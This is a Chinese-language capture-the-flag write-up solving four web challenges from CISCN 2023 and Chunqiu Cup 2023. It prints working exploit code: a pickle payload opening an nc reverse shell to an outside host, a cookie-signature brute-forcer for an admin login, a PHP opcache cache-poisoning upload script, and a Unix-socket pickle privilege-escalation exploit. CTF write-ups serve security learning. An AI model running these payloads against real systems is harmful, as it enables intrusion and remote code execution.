春秋杯春季联赛&&ciscn2023华北赛区部分题解

前言

复现几个比赛时没做出来的题

1.[CISCN 2023 华北赛区]ez_ruby

查文档可知

ruby内置的open函数，如果第一个字符是管道符|，后面就可以接命令。这可能是考察涉猎的知识范围广不广吧。

直接nc反弹shell即可

2.[CISCN 2023 华北赛区]ExifTool

看着天枢佬复现的，说是非预期，不知道预期解长什么样。

有个功能可以上传一个文件，然后他会使用Exif工具给出其exif信息(不过试了很多次没有回显)。

        if 'file' in params:
            filename = params['file'].filename
            fileext = filename.split('.')[-1]
            if fileext.lower() not in ['jpg', 'jpeg', 'png', 'gif']:
                print('Warning: only allow jpg, jpeg, png, gif!')

            session.filename = filename
            session.filedir = filedir

            fout = open(filedir + filename, 'wb')
            fout.write(params['file'].value)
            fout.close()

其会检查文件后缀是否是 jpg,jpeg,png,gif，但由于没有return,即使不是也可以接着执行写操作。

由于filename是可控的,而且也没有对其做任何过滤，此处就会有一个任意文件上传漏洞。

当时认为是exifread这个这个包有洞，看了半天源码，看不下去就放下了。

天枢分享后,得知就是覆盖session文件，然后反序列化rce。

先构造payload

import itsdangerous
import pickle, pickletools
import os
class test():

    def __init__(self):
        self.name = "test"

    def __reduce__(self):
        return (os.system, ("nc ip port -e /bin/bash", ))
a = pickletools.optimize((pickle.dumps(test(), 4)))
print(itsdangerous.base64_encode(a))

将脚本输出内容上传到 sessions目录下的888 的文件中

然后随意访问一个路由即可触发反序列化。(在本地搭的环境)

3.[CISCN 2023华北赛区]dolphin_haihai

问题出在，当用户登录成功时,如果选择7天内自动登录，会设置两个cookie作为身份认证，有效期为7天。

data_auth_sign函数如下，即对 0=admin1+登录时间戳用sha1做签名，那么就可以爆破token来登录admin。

记录一个大概的时间戳,写个脚本跑一下就成。

import requests
import hashlib
import sys

basetime = 168752xxxx

def sign(token):
    token = token.encode()
    return hashlib.sha1(token).hexdigest()

def try_cookie(start, end):
    i = 0
    req = requests.session()
    for time in range(start, end):
        time = str(time)
        token = sign("0=admin1" + time)
        headers = {
            "Cookie":
            f"PHPSESSID=kvcfp2dvj6v7t660brkltgaoul;dolphin_signin_token={token};dolphin_uid=1;"
        }
        response = req.get(
            "http://localhost/admin.php/user/publics/signin.html",
            headers=headers,
            proxies=X)
        # 判断登录是否成功
        i = i + 1
        print("第%d次尝试:%s" % (i, token))
        sys.stdout.flush()
        if "请输入您的用户名" not in response.text:
            print("token is" + token)
            exit(0)

try_cookie(basetime , basetime + 100)

天枢佬说是登录之后用phtml绕过上传即可。这里我没有找到直接的线索表示去上传phtml文件,但是可以看到php文件肯定上传不过去的。

4.[春秋杯 2023]php_again

这道题搞了挺久了。

<?php

$action = $_GET['action'];
if (empty($action)) {
    highlight_file(__FILE__);
    die();
}
switch ($action) {
    case 0_0:
        phpinfo();
        break;
    case 0o0_111:
        exec('zip -r /tmp/www.zip *');
        readfile('/tmp/www.zip');
        break;
    case 0b0_111:
        var_dump(scandir('/var/www/html/'));
        break;
    case 0x0_555:
        file_put_contents('/tmp/tmp.zip',base64_decode($_POST['data']));
        break;
    case 777_777:
        exec('cd /tmp && unzip -o tmp.zip');
        break;
}

?>

5个功能，

• phpinfo信息
• 压缩 /var/www/html目录到 /tmp/www.zip，可以读取 /tmp/www.zip
• 查看当前目录下的文件
• 上传文件 到 /tmp/tmp.zip
• 覆盖解压 /tmp/tmp.zip

根据https://xz.aliyun.com/t/223这篇文章可以注意到phpinfo的如下信息

开启了时间戳校验，所以之后需要获取文件创建时间。

接下来就串一遍流程

• 获取system_id

由于上文中的工具是php7的利用工具。这里我们看一下php8中system_id具体怎么生成的

通过动态调试php8.0.1(8.2.2编译一直不成功)的源码的可以发现。需要以下几个参数

先是PHP_VERSION

再是 ZEND_EXTENSION_BUILD_ID

接着是ZEND_BIN_ID

如果是-dev版本还会加 时间

接下来还有一个 uchar类型参数 hooks

由于这些 if语句都没有进去，所以还会更新一个\0。 8.0.1中最后得到的结果是

用python计算一下。

应该是这样没错了。

但是由于不会在linux动态调试php,ZEND_BIN_ID这个参数可能和windows的略有不同，算出来的结果始终不是正确的system_id.

最后还是在liunx直接下了一个php8.2.2的源码，编译安装了一下，注意一定要 编译安装，这里有个小坑

cd /usr/local
wget https://www.php.net/distributions/php-8.2.2.tar.gz
tar -zxvf php-8.2.2.tar.gz && cd php-8.2.2

注意下载完之后先不要编译！！

在题目的phpinfo信息中可以看到， Zend Extension的值是420020929，而正常拉下来的包都是 420020829.这里可能就是出题人故意改的，所以我们也需要改一下再编译。

打开 /usr/local/php-8.2.2/Zend/zend_extensions.h 文件，将其由原来的829改成929

之后再进行编译安装

apt-get install build-essential autoconf automake libtool libsqlite3-dev pkg-config libjpeg-dev libpng-dev libxml2-dev libbz2-dev libcurl4-gnutls-dev libssl-dev libffi-dev libwebp-dev libonig-dev libzip-dev
./configure --prefix=/usr/local/php --sysconfdir=/etc/php/8.2 --with-openssl --with-zlib --with-bz2 --with-curl --enable-bcmath --enable-gd --with-webp --with-jpeg --with-mhash --enable-mbstring --with-imap-ssl --with-mysqli --enable-exif --with-ffi --with-zip --enable-sockets --with-pcre-jit --enable-fpm --with-pdo-mysql --enable-pcntl
make && make install
cd /usr/bin
ln -s /usr/local/php/bin/php php8.2
cp /usr/local/php-8.2.2/php.ini-development /usr/local/php/lib/php.ini
cp /etc/php/8.2/php-fpm.conf.default /etc/php/8.2/php-fpm.conf
cp /etc/php/8.2/php-fpm.d/www.conf.default /etc/php/8.2/php-fpm.d/www.conf

打开 php.ini文件 ，开启opcache
zend_extension = opcache
opcache.enable=1
opcache.validate_timestamps=1
opcache.consistency_checks=1
opcache.file_cache=/tmp

进入 /var/www/html，写入一句话木马，然后开启服务器

访问之后便会在 /tmp目录下生成缓存文件,这就是正确的 system_id了。

得到index.php.bin

• 用功能二获取压缩包，压缩包中存在文件的创建时间。

解压后可以看到详细的时间

转化为时间戳就是 1687454440

• 用101打开index.php.bin，然后用上文给的模板即可确定时间戳的位置，修改时间戳

• 上传并解压文件

import base64
import requests

import zipfile

url = "http://eci-2ze7fpf1p0c6rj35tzho.cloudeci1.ichunqiu.com/?action="
file_to_compress = 'index.php.bin'
zip_file_path = 'index.zip'
with zipfile.ZipFile(zip_file_path, 'w') as my_zip:
    my_zip.write(
        file_to_compress,
        '246104dd1c75c908e3152fa39e48dfb5/var/www/html/index.php.bin')

f = open(r"C:\Users\chiyan\Desktop\index.zip", "rb")
f = f.read()
f = base64.b64encode(f)
data = {"data": f}
url1 = url + "1365"
res = requests.post(url=url1, data=data)
#第二步 解压文件
url2 = url + "777777"
res = requests.get(url=url2)

• 再次访问时，我们已经拿到shell了

  

接下来就是个python的提权CVE。

import socket
import pickle
import os
import array

class Person():
    def __reduce__(self):
        command=r"cat /flag>/tmp/pwned"
        return (os.system,(command,))

p=Person()
opcode=pickle.dumps(p)
print(opcode)
f = open("exp.data","wb")
f.write(opcode)
f.close()
# 定义抽象命名空间套接字路径 没ss
# socket_path = "\0"+os.popen("ss -lx | grep '@'|awk '{print $5}'").read().replace("@","").strip()
socket_path = "\0listener-51-0"
print(socket_path)
def sendfds(sock, fds):
    '''Send an array of fds over an AF_UNIX socket.'''

# 创建套接字
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# 连接到服务器
sock.connect(socket_path)
# 准备发送的数据
data = opcode
def send_fds(sock, msg, fds):
    return sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", fds))])

file = open("exp.data",'rb')
fd = file.fileno()
parent_r, child_w = os.pipe()
fds = [fd,child_w,fd,fd]
msg = bytes([len(fds) % 256])
send_fds(sock,msg,fds)
# 关闭套接字
sock.close()
file.close()

参考链接